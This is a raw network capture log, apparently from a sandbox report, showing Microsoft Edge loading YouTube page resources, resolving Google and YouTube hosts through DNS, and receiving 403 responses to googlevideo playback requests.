cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgGw%3D%3D
-
GEThttps://www.youtube.com/s/desktop/b1a23d83/jsbin/webcomponents-sd.vflset/webcomponents-sd.jsmsedge.exeRemote address:142.250.200.46:443RequestGET /s/desktop/b1a23d83/jsbin/webcomponents-sd.vflset/webcomponents-sd.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=0vt03kColho
cookie: __Secure-YEC=CgttN0pldXhOWm81QSjJmPO8BjIKCgJHQhIEGgAgGw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgGw%3D%3D
-
GEThttps://www.youtube.com/s/desktop/b1a23d83/jsbin/intersection-observer.min.vflset/intersection-observer.min.jsmsedge.exeRemote address:142.250.200.46:443RequestGET /s/desktop/b1a23d83/jsbin/intersection-observer.min.vflset/intersection-observer.min.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=0vt03kColho
cookie: __Secure-YEC=CgttN0pldXhOWm81QSjJmPO8BjIKCgJHQhIEGgAgGw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgGw%3D%3D
-
Remote address:142.250.200.46:443RequestGET /s/desktop/b1a23d83/jsbin/scheduler.vflset/scheduler.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=0vt03kColho
cookie: __Secure-YEC=CgttN0pldXhOWm81QSjJmPO8BjIKCgJHQhIEGgAgGw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgGw%3D%3D
-
GEThttps://www.youtube.com/s/desktop/b1a23d83/jsbin/www-i18n-constants-en_US.vflset/www-i18n-constants.jsmsedge.exeRemote address:142.250.200.46:443RequestGET /s/desktop/b1a23d83/jsbin/www-i18n-constants-en_US.vflset/www-i18n-constants.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=0vt03kColho
cookie: __Secure-YEC=CgttN0pldXhOWm81QSjJmPO8BjIKCgJHQhIEGgAgGw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgGw%3D%3D
-
GEThttps://www.youtube.com/s/desktop/b1a23d83/cssbin/www-main-desktop-home-page-skeleton.cssmsedge.exeRemote address:142.250.200.46:443RequestGET /s/desktop/b1a23d83/cssbin/www-main-desktop-home-page-skeleton.css HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=0vt03kColho
cookie: __Secure-YEC=CgttN0pldXhOWm81QSjJmPO8BjIKCgJHQhIEGgAgGw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgGw%3D%3D
-
GEThttps://www.youtube.com/s/desktop/b1a23d83/jsbin/www-tampering.vflset/www-tampering.jsmsedge.exeRemote address:142.250.200.46:443RequestGET /s/desktop/b1a23d83/jsbin/www-tampering.vflset/www-tampering.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=0vt03kColho
cookie: __Secure-YEC=CgttN0pldXhOWm81QSjJmPO8BjIKCgJHQhIEGgAgGw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgGw%3D%3D
-
Remote address:142.250.200.46:443RequestGET /s/desktop/b1a23d83/jsbin/spf.vflset/spf.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=0vt03kColho
cookie: __Secure-YEC=CgttN0pldXhOWm81QSjJmPO8BjIKCgJHQhIEGgAgGw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgGw%3D%3D
-
Remote address:142.250.200.46:443RequestGET /s/desktop/b1a23d83/jsbin/network.vflset/network.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=0vt03kColho
cookie: __Secure-YEC=CgttN0pldXhOWm81QSjJmPO8BjIKCgJHQhIEGgAgGw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgGw%3D%3D
-
Remote address:142.250.200.46:443RequestGET /s/desktop/b1a23d83/cssbin/www-onepick.css HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=0vt03kColho
cookie: __Secure-YEC=CgttN0pldXhOWm81QSjJmPO8BjIKCgJHQhIEGgAgGw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgGw%3D%3D
-
GEThttps://www.youtube.com/s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.LSec7Jwfb8w.L.B1.O/am=AABBAg/d=0/br=1/rs=AGKMywFNrzpfBvS2ypCotqks7bJEMYSxLQmsedge.exeRemote address:142.250.200.46:443RequestGET /s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.LSec7Jwfb8w.L.B1.O/am=AABBAg/d=0/br=1/rs=AGKMywFNrzpfBvS2ypCotqks7bJEMYSxLQ HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=0vt03kColho
cookie: __Secure-YEC=CgttN0pldXhOWm81QSjJmPO8BjIKCgJHQhIEGgAgGw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgGw%3D%3D
-
GEThttps://www.youtube.com/s/desktop/b1a23d83/cssbin/www-main-desktop-watch-page-skeleton.cssmsedge.exeRemote address:142.250.200.46:443RequestGET /s/desktop/b1a23d83/cssbin/www-main-desktop-watch-page-skeleton.css HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=0vt03kColho
cookie: __Secure-YEC=CgttN0pldXhOWm81QSjJmPO8BjIKCgJHQhIEGgAgGw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgGw%3D%3D
-
Remote address:8.8.8.8:53Requestwww.youtube.comIN AResponsewww.youtube.comIN CNAMEyoutube-ui.l.google.comyoutube-ui.l.google.comIN A142.250.200.14youtube-ui.l.google.comIN A172.217.169.78youtube-ui.l.google.comIN A216.58.212.206youtube-ui.l.google.comIN A216.58.213.14youtube-ui.l.google.comIN A142.250.187.206youtube-ui.l.google.comIN A172.217.16.238youtube-ui.l.google.comIN A172.217.169.14youtube-ui.l.google.comIN A216.58.201.110youtube-ui.l.google.comIN A142.250.200.46youtube-ui.l.google.comIN A142.250.187.238youtube-ui.l.google.comIN A172.217.169.46youtube-ui.l.google.comIN A142.250.180.14youtube-ui.l.google.comIN A216.58.204.78youtube-ui.l.google.comIN A142.250.179.238youtube-ui.l.google.comIN A142.250.178.14
-
Remote address:8.8.8.8:53Request46.200.250.142.in-addr.arpaIN PTRResponse46.200.250.142.in-addr.arpaIN PTRlhr48s30-in-f141e100net
-
Remote address:8.8.8.8:53Requesti.ytimg.comIN AResponsei.ytimg.comIN A172.217.169.22i.ytimg.comIN A142.250.200.54i.ytimg.comIN A142.250.178.22i.ytimg.comIN A216.58.204.86i.ytimg.comIN A216.58.201.118i.ytimg.comIN A172.217.169.54i.ytimg.comIN A142.250.179.246i.ytimg.comIN A142.250.187.246i.ytimg.comIN A172.217.169.86i.ytimg.comIN A142.250.187.214i.ytimg.comIN A216.58.212.214i.ytimg.comIN A216.58.212.246i.ytimg.comIN A172.217.16.246i.ytimg.comIN A142.250.200.22i.ytimg.comIN A142.250.180.22
-
Remote address:172.217.169.22:443RequestGET /generate_204 HTTP/2.0
host: i.ytimg.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Requestaccounts.google.comIN AResponseaccounts.google.comIN A64.233.167.84
-
GEThttps://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=enmsedge.exeRemote address:64.233.167.84:443RequestGET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en HTTP/2.0
host: accounts.google.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Request14.200.250.142.in-addr.arpaIN PTRResponse14.200.250.142.in-addr.arpaIN PTRlhr48s29-in-f141e100net
-
Remote address:8.8.8.8:53Request22.169.217.172.in-addr.arpaIN PTRResponse22.169.217.172.in-addr.arpaIN PTRlhr25s26-in-f221e100net
-
Remote address:8.8.8.8:53Request234.16.217.172.in-addr.arpaIN PTRResponse234.16.217.172.in-addr.arpaIN PTRmad08s04-in-f101e100net234.16.217.172.in-addr.arpaIN PTRlhr48s28-in-f10�I
-
Remote address:8.8.8.8:53Request67.204.58.216.in-addr.arpaIN PTRResponse67.204.58.216.in-addr.arpaIN PTRlhr48s49-in-f31e100net67.204.58.216.in-addr.arpaIN PTRlhr25s13-in-f67�G67.204.58.216.in-addr.arpaIN PTRlhr25s13-in-f3�G
-
Remote address:8.8.8.8:53Request84.167.233.64.in-addr.arpaIN PTRResponse84.167.233.64.in-addr.arpaIN PTRwl-in-f841e100net
-
Remote address:216.58.213.4:443RequestGET /js/th/9qOIBUG39ay8paWZdcfdyc9gzYxr5h8ybqzR89LD9TM.js HTTP/2.0
host: www.google.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Requestrr4---sn-q4fl6nsd.googlevideo.comIN AResponserr4---sn-q4fl6nsd.googlevideo.comIN CNAMErr4.sn-q4fl6nsd.googlevideo.comrr4.sn-q4fl6nsd.googlevideo.comIN A74.125.3.169
-
GEThttps://rr4---sn-q4fl6nsd.googlevideo.com/videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&ctier=L&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeCmsedge.exeRemote address:74.125.3.169:443RequestGET /videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&ctier=L&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC HTTP/1.1
Host: rr4---sn-q4fl6nsd.googlevideo.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.youtube.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.youtube.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/plain
Content-Length: 0
Connection: close
Access-Control-Allow-Origin: https://www.youtube.com
Access-Control-Allow-Credentials: true
Timing-Allow-Origin: https://www.youtube.com
Access-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-Ms
Vary: Origin
Cross-Origin-Resource-Policy: cross-origin
X-Content-Type-Options: nosniff
Date: Fri, 31 Jan 2025 13:12:43 GMT
Server: gvs 1.0
-
GEThttps://rr4---sn-q4fl6nsd.googlevideo.com/videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeCmsedge.exeRemote address:74.125.3.169:443RequestGET /videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC HTTP/1.1
Host: rr4---sn-q4fl6nsd.googlevideo.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.youtube.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.youtube.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/plain
Content-Length: 0
Connection: close
Access-Control-Allow-Origin: https://www.youtube.com
Access-Control-Allow-Credentials: true
Timing-Allow-Origin: https://www.youtube.com
Access-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-Ms
Vary: Origin
Cross-Origin-Resource-Policy: cross-origin
X-Content-Type-Options: nosniff
Date: Fri, 31 Jan 2025 13:12:43 GMT
Server: gvs 1.0
-
GEThttps://rr4---sn-q4fl6nsd.googlevideo.com/videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&ctier=L&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeCmsedge.exeRemote address:74.125.3.169:443RequestGET /videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&ctier=L&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC HTTP/1.1
Host: rr4---sn-q4fl6nsd.googlevideo.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.youtube.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.youtube.com/
Accept-Encoding: gzip, deflate, br
